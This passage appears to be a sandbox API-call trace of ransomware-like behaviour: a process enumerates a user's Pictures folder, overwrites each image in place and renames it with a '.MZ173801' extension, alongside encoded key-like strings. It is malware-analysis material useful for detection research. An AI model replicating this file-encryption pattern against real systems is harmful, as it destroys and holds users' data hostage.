RjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0114.240] GetCurrentThreadId () returned 0x1358 [0114.240] GetCurrentThreadId () returned 0x1358 [0114.240] GetCurrentThreadId () returned 0x1358 [0114.240] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\oA91dS68Kck7s8GQB.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\oa91ds68kck7s8gqb.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.240] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0114.240] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.241] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x1480f [0114.241] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.241] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1480f, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x1480f, lpOverlapped=0x0) returned 1 [0114.242] CloseHandle (hObject=0x3f8) returned 1 [0114.243] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\oA91dS68Kck7s8GQB.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\oa91ds68kck7s8gqb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.245] WriteFile (in: hFile=0x3f8, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x1480f, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f9bc*=0x1480f, lpOverlapped=0x0) returned 1 [0114.247] CloseHandle (hObject=0x3f8) returned 1 [0114.249] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\oA91dS68Kck7s8GQB.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\oa91ds68kck7s8gqb.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\oA91dS68Kck7s8GQB.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\oa91ds68kck7s8gqb.gif.mz173801")) returned 1 [0114.250] GetCurrentThreadId () returned 0x1358 [0114.250] GetCurrentThreadId () returned 0x1358 [0114.250] GetCurrentThreadId () returned 0x1358 [0114.250] GetCurrentThreadId () returned 0x1358 [0114.250] GetCurrentThreadId () returned 0x1358 [0114.250] GetCurrentThreadId () returned 0x1358 [0114.250] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x320cf630, ftCreationTime.dwHighDateTime=0x1d5e9cf, ftLastAccessTime.dwLowDateTime=0x1c3f2a00, ftLastAccessTime.dwHighDateTime=0x1d5e32e, ftLastWriteTime.dwLowDateTime=0x1c3f2a00, ftLastWriteTime.dwHighDateTime=0x1d5e32e, nFileSizeHigh=0x0, nFileSizeLow=0x858c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="P9y3n H.jpg", cAlternateFileName="P9Y3NH~1.JPG")) returned 1 [0114.250] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.250] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.250] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\P9y3n H.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\p9y3n h.jpg"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x320cf630, ftCreationTime.dwHighDateTime=0x1d5e9cf, ftLastAccessTime.dwLowDateTime=0x1c3f2a00, ftLastAccessTime.dwHighDateTime=0x1d5e32e, ftLastWriteTime.dwLowDateTime=0x1c3f2a00, ftLastWriteTime.dwHighDateTime=0x1d5e32e, nFileSizeHigh=0x0, nFileSizeLow=0x858c)) returned 1 [0114.251] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.251] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0114.251] GetCurrentThreadId () returned 0x1358 [0114.251] GetCurrentThreadId () returned 0x1358 [0114.251] GetCurrentThreadId () returned 0x1358 [0114.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0114.252] GetCurrentThreadId () returned 0x1358 [0114.252] GetCurrentThreadId () returned 0x1358 [0114.252] GetCurrentThreadId () returned 0x1358 [0114.252] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\P9y3n H.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\p9y3n h.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.252] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0114.252] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.252] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x858c [0114.252] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.252] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x858c, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x858c, lpOverlapped=0x0) returned 1 [0114.253] CloseHandle (hObject=0x3f8) returned 1 [0114.254] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\P9y3n H.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\p9y3n h.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.255] WriteFile (in: hFile=0x3f8, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x858c, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f9bc*=0x858c, lpOverlapped=0x0) returned 1 [0114.256] CloseHandle (hObject=0x3f8) returned 1 [0114.702] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\P9y3n H.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\p9y3n h.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\P9y3n H.jpg.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\p9y3n h.jpg.mz173801")) returned 1 [0114.702] GetCurrentThreadId () returned 0x1358 [0114.703] GetCurrentThreadId () returned 0x1358 [0114.703] GetCurrentThreadId () returned 0x1358 [0114.703] GetCurrentThreadId () returned 0x1358 [0114.703] GetCurrentThreadId () returned 0x1358 [0114.703] GetCurrentThreadId () returned 0x1358 [0114.703] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd2eb000, ftCreationTime.dwHighDateTime=0x1d5ee24, ftLastAccessTime.dwLowDateTime=0xf00ccfd0, ftLastAccessTime.dwHighDateTime=0x1d5e555, ftLastWriteTime.dwLowDateTime=0xf00ccfd0, ftLastWriteTime.dwHighDateTime=0x1d5e555, nFileSizeHigh=0x0, nFileSizeLow=0x443a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="QWOw3VER.gif", cAlternateFileName="")) returned 1 [0114.703] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.703] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.703] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\QWOw3VER.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\qwow3ver.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd2eb000, ftCreationTime.dwHighDateTime=0x1d5ee24, ftLastAccessTime.dwLowDateTime=0xf00ccfd0, ftLastAccessTime.dwHighDateTime=0x1d5e555, ftLastWriteTime.dwLowDateTime=0xf00ccfd0, ftLastWriteTime.dwHighDateTime=0x1d5e555, nFileSizeHigh=0x0, nFileSizeLow=0x443a)) returned 1 [0114.706] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.706] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0114.706] GetCurrentThreadId () returned 0x1358 [0114.706] GetCurrentThreadId () returned 0x1358 [0114.706] GetCurrentThreadId () returned 0x1358 [0114.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 